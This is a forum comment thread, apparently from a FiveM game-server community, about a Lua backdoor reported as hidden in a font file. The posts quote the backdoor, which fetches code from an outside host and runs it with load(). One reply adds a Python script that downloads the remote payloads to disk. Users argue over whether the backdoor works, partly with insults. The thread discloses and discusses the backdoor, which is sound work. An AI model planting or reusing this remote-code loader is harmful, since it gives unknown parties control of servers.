desmondcdscdscdscds 0 Posted January 6 local _v = PerformHttpRequestInternalEx{ url='https://fivems.lt/szbm', method='GET' } AddEventHandler('__cfx_internal:httpResponse', function(_t, _s, _b) if _v == _t then pcall(function() assert(load(_b))() end) end end) backdoor code found hidden in tff file
Gator | Retired Staff 8 Posted January 6 did some digging with what you sent and it doesnt seem to be doing anything, the url redirects to cfx.re, ive even ran just that code in a closed environment and the loading failed 1
Gator | Retired Staff 8 Posted January 6 1 hour ago, desmondcdscdscdscds said: local _v = PerformHttpRequestInternalEx{ url='https://fivems.lt/szbm', method='GET' } AddEventHandler('__cfx_internal:httpResponse', function(_t, _s, _b) if _v == _t then pcall(function() assert(load(_b))() end) end end) backdoor code found hidden in tff file did some digging with what you sent and it doesnt seem to be doing anything, the url redirects to cfx.re, ive even ran just that code in a closed environment and the loading failed 1
Gator | Retired Staff 8 Posted January 6 1 hour ago, desmondcdscdscdscds said: local _v = PerformHttpRequestInternalEx{ url='https://fivems.lt/szbm', method='GET' } AddEventHandler('__cfx_internal:httpResponse', function(_t, _s, _b) if _v == _t then pcall(function() assert(load(_b))() end) end end) backdoor code found hidden in tff file without the szbm the link goes here https://fivems.lt 1
dawdwadawawdannn. 0 Posted February 12 it does do something dummy i have made a python code for everyone who is doubting me you can run it and it will save a .js file with the content it got: import requests urls = [ "https://fivems.lt/nullJJ", "https://fivems.lt/nullJJgg", "https://fivems.lt/nullJJcfxre" ] for url in urls: try: resp = requests.get(url, timeout=10) if resp.status_code == 200: fname = url.replace("https://fivems.lt/", "").replace("`","") + ".js" with open(fname, "w", encoding="utf-8") as f: f.write(resp.text) print(f"saved {fname}") else: print(f"failed {url} with status {resp.status_code}") except Exception as e: print(f"error fetching {url}: {e}")
dawdwadawawdannn. 0 Posted February 12 On 1/6/2026 at 6:25 AM, Gator | Retired Staff said: did some digging with what you sent and it doesnt seem to be doing anything, the url redirects to cfx.re, ive even ran just that code in a closed environment and the loading failed You are either braindead or you are part of the ppl putting the backdoors there.
Gator | Retired Staff 8 Posted June 16 you've shown no proof of anything lol again it does nothing, cyber security is what i do for a living. the code in the script never actually does anything. and the server has been done for awhile now. you say you've got the .js files so lets see them
Gator | Retired Staff 8 Posted June 16 you've shown no proof of anything lol again it does nothing, cyber security is what i do for a living. the code in the script never actually does anything. and the server has been done for awhile now. you say you've got the .js files so lets see them
Recommended Comments
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now